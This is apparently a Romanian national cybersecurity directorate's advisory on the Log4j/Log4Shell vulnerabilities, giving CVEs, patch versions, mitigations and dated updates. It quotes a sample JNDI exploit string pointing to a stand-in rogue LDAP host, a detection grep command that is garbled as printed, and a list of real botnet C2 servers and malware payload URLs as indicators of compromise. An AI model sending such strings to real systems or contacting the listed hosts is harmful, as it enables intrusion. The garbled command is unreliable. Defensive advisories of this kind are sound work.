Vulnerabilitate critică de tip zero-day afectează Log4j, o bibliotecă Java utilizată la scară largă

Foto: DNSC

UPDATE 28 Decembrie 2021

Atenție la noua vulnerabilitate a librăriei Log4j (CVE-2021-44832), care permite execuție de cod de la distanță prin intermediul clasei Java JDBCAppender (clasa Java ce oferă un mecanism de transmitere a log-urilor către baza de date).

Condiția pentru exploatarea cu succes este ca atacatorul să controleze fișierul de configurare. Versiunile care rezolvă acestă vulnerabilitate sunt Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) și 2.3.2 (Java 6). Este recomandată actualizarea de urgență: https://logging.apache.org/log4j/2.x/security.html

Echipa Directoratului v-a pregătit o listă care conține software afectat de vulnerabilitatea librăriei Log4j, care poate fi descărcată, în formart .xlsx, accesând acest link: https://dnsc.ro/vezi/document/software-afectat-de-vulnerabilitatile-librariei-log4j-29-12-2021

UPDATE 21 Decembrie 2021

Lista actualizată de vulnerabilități Log4j și remedierile recomandate:

CVE-2021-44228 (scor CVSS: 10.0) – O vulnerabilitate de execuție a codului de la distanță care afectează versiunile Log4j de la 2.0-beta9 la 2.14.1 (rezolvat în versiunea 2.15.0)

CVE-2021-45046 (scor CVSS: 9.0) – Vulnerabilitate care permite scurgerea de informații și executarea codului de la distanță, ce afectează versiunile Log4j de la 2.0-beta9 la 2.15.0, excluzând 2.12.2 (rezolvat în versiunea 2.16.0)

CVE-2021-45105 (scor CVSS: 7.5) – O denial-of-service care afectează versiunile Log4j de la 2.0-beta9 la 2.16.0 (rezolvat în versiunea 2.17.0)

Se recomandă urmărirea frecventă a recomandărilor publicate de Apache, precum și actualizarea la versiunea 2.17.0 cât mai curând posibil. Deoarece biblioteca Log4j este atât de frecvent utilizată și există dovezi că este vizată de actori malițioși, actualizarea și atenuarea riscului ar trebui să fie o prioritate!

UPDATE 17 Decembrie 2021

Echipa Directoratului Național de Securitate Cibernetică (DNSC) urmărește cu atenție evoluțiile legate de vulnerabilitatea Log4Shell (CVE-2021-44228) raportată în Apache Log4j 2. 

Intenționăm să lansăm la finalul zilei de vineri, 17 Decembrie, o verificare/scanare masivă la nivel național de domenii pentru vulnerabilitatea Log4Shell. 

Această acțiune va acoperi domenii web ce aparțin unor:

1. Organizații care au solicitat scanarea de către Directorat a domeniului lor (proprietari și administratori legitimi de domenii)
2. Instituții ale statului
3. O selecție de licee, școli, universități, operatori de servicii esențiale și IMM-uri cu profil de risc ridicat

Avem rugămintea să ne contactați cât mai rapid, în cazul în care acțiunea planificată de către DNSC afectează negativ operațiuni pe care le aveți în derulare la nivelul instituției/organizației dvs. Pentru detalii tehnice, vă rugăm să utilizați adresa de contact [email protected].  

UPDATE 15 Decembrie 2021

A doua vulnerabilitate, CVE-2021-45046, are scorul CVSS de 3.7 din 10 și afectează toate versiunile Log4j de la 2.0-beta9 până la 2.12.1, dar și versiunile de la 2.13.0 până la 2.15.0, pentru care au fost lansate actualizări saptămâna trecută. Aceste update-uri au fost dedicate remedierii vulnerabilității care permitea rularea de instrucțiuni de la distanță CVE-2021-44228.

Update-ul incomplet pentru remedierea CVE-2021-44228 poate fi abuzat prin comenzi malițioase care utilizează JNDI Lookup, ducând la atacuri de tipul Denial of Service (DoS). Actualizarea Log4j la versiunea 2.16.0 necesită Java 8. Pentru utilizatorii de Java 7 se recomandă actualizarea la versiunea 2.12.2, în momentul când aceasta va fi disponibilă.

UPDATE 13 Decembrie 2021, 17:00

Marea majoritate a activităților observate au fost reprezentate de scanări, dar au fost observate deopotrivă activități de exploatare și post-exploatare. În funcție de natura vulnerabilității, odată ce atacatorul are acces deplin și control al unei aplicații, acesta poate îndeplini o multitudine de obiective. Echipa de securitate Microsoft a observat activități precum instalarea de software dedicat minării de criptomonede, Cobalt Strike - pentru a permite furtul de credențiale – dar și activități de mișcare laterală și extragerea datelor din sistemele compromise.

Pentru că există o arie largă de exploatare a rețelei prin această vulnerabilitate și a faptului că aplicarea holistică a măsurilor de atenuare va necesita timp, este încurajată căutarea semnelor de post-exploatare. Bazarea exclusiv pe măsuri de prevenire nu este suficientă.

Surse pentru monitorizarea indicatorilor de compromitere (IOCs)

• GreyNoise (1)
• Github Malware Ninja
• Tweetfeedlive by @0xDanielLopez
• Azure Sentinel
• URLhaus
• Github CISA
• Malware Bazaar
• ThreatFox
• Cronup
• RedDrip7
• AbuseIPDB - Google/Bing Dorkssite:abuseipdb.com "log4j", site:abuseipdb.com "log4shell"
• CrowdSec
• Andrew Grealy, CTCI
• Bad Packets
• NCSC-NL
• Costin Raiu, Kaspersky
• SANS Internet Storm Center

Bucuresti, 13 Decembrie 2021, 11:00

O vulnerabilitate critică (0-day) într-o bibliotecă populară Java, numită „Log4j”, poate fi exploatată liber de atacatori. La momentul divulgării publice a informației, nu era disponibil niciun patch de securitate pentru a o remedia, dar între timp au apărut o serie de măsuri de atenuare.

Dezvoltată și întreținută de Apache, biblioteca este adoptată pe scară largă și utilizată în multe produse software comerciale și open-source ca un framework de înregistrare a informațiilor pentru Java.

Descriere

Severitatea vulnerabilității (CVE-2021-44228) este una ridicată, deoarece aceasta poate fi exploatată de la distanță de un atacator neautentificat prin executarea codului (remote code execution – RCE). Mai mult, CVE-2021-44228 are un scor de 10 (din 10) în sistemul comun de notare a vulnerabilității (CVSS).

Problema de securitate provine din modul în care mesajele jurnal sunt gestionate de procesorul log4j. În cazul în care un atacator trimite un mesaj special conceput (care conține un șir de caractere cum ar fi $-jndi:ldap://rogueldapserver.com/a}), acest lucru poate duce la încărcarea unei clase de coduri externe sau a căutării mesajelor și la executarea codului respectiv, ceea ce duce la o situație cunoscută sub numele de execuție de cod de la distanță.

Impact

Cu toate că vulnerabilitatea are un grad de complexitate ridicat, exploatarea sa cu succes depinde de mai multe condiții, cum ar fi utilizarea JVM, configurația reală, etc. Versiunile log4j între 2.0 și 2.14.1 sunt afectate.

Deoarece mulți furnizori terți se bazează pe Log4j pentru produsele lor, s-a lucrat intens pentru lansarea unor patch-uri dedicate acestora. În ultimele 48 de ore, mulți furnizori au publicat astfel de patch-uri de securitate.

Remediere

Recomandăm verificarea urgentă a folosirii Log4j în software-ul utilizat și aplicarea patch-urilor corespunzătoare cât mai curând posibil. În cazul în care nu se pot aplica patch-uri, este indicată luarea oricărei măsuri de atenuare, pentru a evita alte daune.

• Obțineți o imagine de ansamblu a sistemelor și a software-ului care utilizează log4j în mediul dvs. (acest lucru poate fi o sarcină consumatoare de timp, deci ar fi bine să începeți urgent).
• Aplicați imediat patch-urile de securitate corespunzătoare pentru software-ul/dispozitivele care folosesc internetul
• Aplicați patch-urile de securitate corespunzătoare deopotrivă pentru software-ul/dispozitivele interne cât mai curând posibil
• În cazul în care aplicarea patch-urilor nu este posibilă din varii motive, recomandăm insistent izolarea sistemului de accesul la internet și/sau aplicarea următoarelor măsuri de atenuare:

• Pentru versiunea >=2.10: setați formatMsgNoLookups la true
• Pentru versiunile de la 2.0 la 2.10.0: eliminați clasa LDAP din log4j complet prin emiterea următoarei comenzi: zip -q -d log4j-core-*.jar org/apache/log4j/core/lookup/JndiLookup.class
• Pentru anumite versiuni JVM, este posibil să setați sun.jndi.rmi.object.trustURLCodebase și com.sun.jndi.cosnaming.object.trustURLCodebase pentru a atenua vulnerabilitatea. Unele versiuni JVM au deja acest lucru ca setare implicită

• Puteți verifica încercările de exploatare – indiferent dacă au avut succes sau nu – în jurnalele serverului dvs. web, utilizând următoarea comandă Linux/Unix: sudo egrep -i -r’\$\ & jndi:(ldap[s]?rmi...dns):/[^\n]+"/var/log/
• Verificați jurnalele perimetrului rețelei pentru prezența listei indicatorilor de compromis (IOC) menționată mai jos:

nazi.uy # Mirai botnet C2

log.exposedbotnets.ru # Tsunami botnet C2

194.59.165.21:8080 # Tsunami botnet C2

195.133.40.15:25565 # Mirai botnet C2

185.154.53.140:80 # Kinsing botnet C2

138.197.206.223:80 # Kinsing payload delivery server

18.228.7.109:80 # Kinsing payload delivery server

82.118.18.201:80 # Kinsing payload delivery server

92.242.40.21:80 # Kinsing payload delivery server

185.191.32.198:80 # Kinsing payload delivery server

80.71.158.12:80 # Kinsing payload delivery server

185.191.32.198:80 # Kinsing payload delivery server

45.137.155.55:80 # Kinsing payload delivery server

185.191.32.198:80 # Kinsing payload delivery server

45.137.155.55:80 # Kinsing payload delivery server

62.210.130.250:80 # Mirai payload delivery server

http://210.141.105.67/wp-content/themes/twentythirteen/m8 # Kinsing payload URL

http://159.89.182.117/wp-content/themes/twentyseventeen/ldm # Kinsing payload URL

45.130.229.168:1389 # Rogue LDAP server

82.118.18.201:1534 # Rogue LDAP server

45.130.229.168:1389 # Rogue LDAP server

185.250.148.157:1389 # Rogue LDAP server

92.242.40.21:5557 # Rogue LDAP server

205.185.115.217:47324 # Rogue LDAP server

163.172.157.143:1389 # Rogue LDAP server

45.155.205.233:12344 # Rogue LDAP server

• Dacă utilizați un IDS bazat pe Snort sau Suricata (ori compatibil), utilizați reguli pentru a detecta încercările de exploatare.
• Dacă aveți sisteme vulnerabile, verificați-le foarte atent pentru orice semn de exploatare, deoarece scanarea este foarte intensă și sistemele vulnerabile pot fi exploatate rapid.
• Dacă utilizați un WAF, implementați regulile specifice log4j. Acestea există pentru multe soluții comerciale, cum ar fi Cloud Armor6, Cloudflare WAF7, Signal Sciences WAF8.
• Recomandăm actualizarea bibliotecilor log4j la ultima versiune disponibilă: https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0

Surse:

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/#fn:1

https://github.com/curated-intel/Log4Shell-IOCs

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html